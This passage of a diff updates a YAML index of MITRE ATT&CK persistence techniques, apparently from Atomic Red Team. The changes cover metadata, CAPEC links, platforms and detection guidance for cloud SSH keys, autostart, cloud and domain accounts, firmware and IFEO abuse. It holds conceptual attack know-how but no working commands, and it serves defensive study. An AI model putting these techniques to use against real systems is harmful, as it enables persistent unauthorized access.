After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-07-15T12:43:36.340Z' + modified: '2020-10-05T16:43:27.024Z' created: '2020-01-19T16:10:15.008Z' x_mitre_contributors: + - Expel - Oleg Kolesnikov, Securonix - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator + - User x_mitre_detection: |- - Monitor Azure Activity Logs for service principal modifications. + Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. x_mitre_data_sources: + - Stackdriver logs + - GCP audit logs + - AWS CloudTrail logs - Azure activity logs x_mitre_platforms: - Azure AD - Azure + - AWS + - GCP atomic_tests: [] T1546.009: technique: @@ -9218,7 +9514,7 @@ persistence: and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) + shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims @@ -9796,10 +10092,22 @@ persistence: name: command_prompt T1547: technique: + id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. + name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1547 url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html - url: http://msdn.microsoft.com/en-us/library/aa376977 description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. @@ -9823,29 +10131,18 @@ persistence: description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Autostart Execution - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.683Z' + modified: '2020-10-09T16:05:36.772Z' created: '2020-01-23T17:46:59.535Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_permissions_required: - - User - - Administrator - - root + x_mitre_platforms: + - Linux + - macOS + - Windows x_mitre_detection: "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, @@ -9864,10 +10161,12 @@ persistence: Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation." - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' atomic_tests: [] T1037: technique: @@ -9899,12 +10198,13 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.953Z' + modified: '2020-08-03T16:47:37.240Z' created: '2017-05-31T21:30:38.910Z' x_mitre_is_subtechnique: false x_mitre_platforms: - macOS - Windows + - Linux x_mitre_detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions @@ -9913,7 +10213,7 @@ persistence: x_mitre_data_sources: - File monitoring - Process monitoring - x_mitre_version: '2.0' + x_mitre_version: '2.1' atomic_tests: [] T1542.003: technique: @@ -9921,6 +10221,9 @@ persistence: - source_name: mitre-attack external_id: T1542.003 url: https://attack.mitre.org/techniques/T1542/003 + - external_id: CAPEC-552 + source_name: capec + url: https://capec.mitre.org/data/definitions/552.html - source_name: Mandiant M Trends 2016 url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved @@ -9946,13 +10249,13 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-05-07T22:32:05.335Z' + modified: '2020-09-17T19:47:14.338Z' created: '2019-12-19T21:05:38.123Z' x_mitre_defense_bypassed: - Host intrusion prevention systems - Anti-virus - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -10160,7 +10463,7 @@ persistence: The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 type: attack-pattern kill_chain_phases: @@ -10492,6 +10795,15 @@ persistence: atomic_tests: [] T1078.004: technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.004 @@ -10508,15 +10820,6 @@ persistence: url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs description: Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Accounts - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -10527,21 +10830,8 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:59:36.729Z' + modified: '2020-10-19T16:01:22.090Z' created: '2020-03-13T20:36:57.378Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal - or malicious activity, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs x_mitre_platforms: - AWS - GCP @@ -10549,9 +10839,39 @@ persistence: - SaaS - Azure AD - Office 365 + x_mitre_data_sources: + - Azure activity logs + - Authentication logs + - AWS CloudTrail logs + - Stackdriver logs + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1542.002: technique: + created: '2019-12-19T20:21:21.669Z' + modified: '2020-03-23T23:48:33.904Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 + description: |- + Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. + + Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. + name: Component Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1542.002 @@ -10567,44 +10887,27 @@ persistence: health and make sure it's not already dying on you. Retrieved October 2, 2018. source_name: ITWorld Hard Disk Health Dec 2014 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Firmware - description: |- - Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. - - Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. - id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-23T23:48:33.904Z' - created: '2019-12-19T20:21:21.669Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Ability to update component device firmware from the host operating system. - x_mitre_permissions_required: - - SYSTEM - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_detection: |- - Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. - - Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_platforms: + - Windows x_mitre_data_sources: - Component firmware - Process monitoring - Disk forensics - API monitoring - x_mitre_platforms: - - Windows + x_mitre_detection: |- + Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. + + Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. + x_mitre_defense_bypassed: + - Anti-virus + - Host intrusion prevention systems + - File monitoring + x_mitre_permissions_required: + - SYSTEM + x_mitre_system_requirements: + - Ability to update component device firmware from the host operating system. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1546.015: technique: @@ -10776,34 +11079,6 @@ persistence: atomic_tests: [] T1543: technique: - created: '2020-01-10T16:03:18.865Z' - modified: '2020-03-25T22:32:16.537Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - name: Create or Modify System Process - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1543 @@ -10819,10 +11094,42 @@ persistence: description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.' source_name: OSX Malware Detection - x_mitre_platforms: - - Windows - - macOS - - Linux + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). " + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - Windows event logs + - Windows Registry + - File monitoring + - Process command-line parameters + - Process monitoring + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false x_mitre_detection: "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during @@ -10835,14 +11142,10 @@ persistence: process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes." - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring + x_mitre_platforms: + - Windows + - macOS + - Linux atomic_tests: [] T1053.003: technique: @@ -11081,9 +11384,9 @@ persistence: - source_name: mitre-attack external_id: T1574.002 url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-capec + - external_id: CAPEC-641 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/641.html - source_name: About Side by Side Assemblies url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved @@ -11111,7 +11414,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:05:42.513Z' + modified: '2020-10-17T15:15:27.807Z' created: '2020-03-13T19:41:37.908Z' x_mitre_defense_bypassed: - Anti-virus @@ -11170,6 +11473,9 @@ persistence: - source_name: mitre-attack external_id: T1078.001 url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html - source_name: Microsoft Local Accounts Feb 2019 url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February @@ -11196,9 +11502,9 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:37:34.567Z' + modified: '2020-09-16T19:41:43.491Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -11349,31 +11655,13 @@ persistence: elevation_required: false T1078.002: technique: - created: '2020-03-13T20:21:54.758Z' - modified: '2020-03-23T21:08:40.063Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - type: attack-pattern - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - name: Domain Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.002 url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html - url: https://technet.microsoft.com/en-us/library/dn535501.aspx description: Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. @@ -11386,22 +11674,43 @@ persistence: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Authentication logs - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - Authentication logs + - Process monitoring + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1574.004: technique: @@ -11420,9 +11729,9 @@ persistence: - source_name: mitre-attack external_id: T1574.004 url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-471 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/471.html - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. @@ -11439,7 +11748,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:06:47.115Z' + modified: '2020-09-16T16:48:09.391Z' created: '2020-03-16T15:23:30.896Z' x_mitre_platforms: - macOS @@ -11537,6 +11846,18 @@ persistence: - source_name: mitre-attack external_id: T1546 url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. + source_name: amnesia malware object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -11548,8 +11869,9 @@ persistence: may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked. - \n\nSince the execution can be proxied by an account with higher permissions, + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. " id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -11559,9 +11881,9 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-07-09T13:55:51.501Z' + modified: '2020-10-21T18:48:27.576Z' created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_detection: "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition @@ -11678,7 +12000,7 @@ persistence: Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 type: attack-pattern kill_chain_phases: @@ -11830,7 +12152,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-26T16:09:59.324Z' + modified: '2020-10-17T15:15:28.288Z' created: '2020-03-12T20:38:12.465Z' x_mitre_data_sources: - Environment variable @@ -11960,11 +12282,11 @@ persistence: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Image File Execution Options Injection description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO 